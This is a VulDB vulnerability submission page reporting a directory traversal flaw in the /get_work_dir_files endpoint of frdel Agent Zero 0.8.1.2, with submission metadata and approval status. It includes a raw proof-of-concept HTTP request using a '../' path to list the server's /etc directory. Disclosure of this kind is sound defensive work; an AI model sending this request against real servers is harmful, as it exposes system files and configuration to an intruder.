إرسال #546220: frdel Agent Zero 0.8.1.2 File and Directory Information Exposureالمعلومات

عنوانfrdel Agent Zero 0.8.1.2 File and Directory Information Exposure
الوصفAgent-Zero is an AI agent project with 6.4K GitHub favorites, and its /get_work_dir_files interface has a directory traversal vulnerability, which can be used by attackers to obtain the target server architecture and sensitive information GET /get_work_dir_files?path=../../../../../../../etc/ HTTP/1.1 Host: host User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Accept: */* Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: close
المصدر⚠️ https://github.com/frdel/agent-zero
المستخدم
 ekkoo (UID 83509)
ارسال30/03/2025 07:09 PM (1 سنة منذ)
الاعتدال13/04/2025 07:42 PM (14 days later)
الحالةتمت الموافقة
إدخال VulDB304588 [frdel Agent-Zero 0.8.1.2 /get_work_dir_files path اجتياز الدليل]
النقاط20

التالي نظرة عامة السابق

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!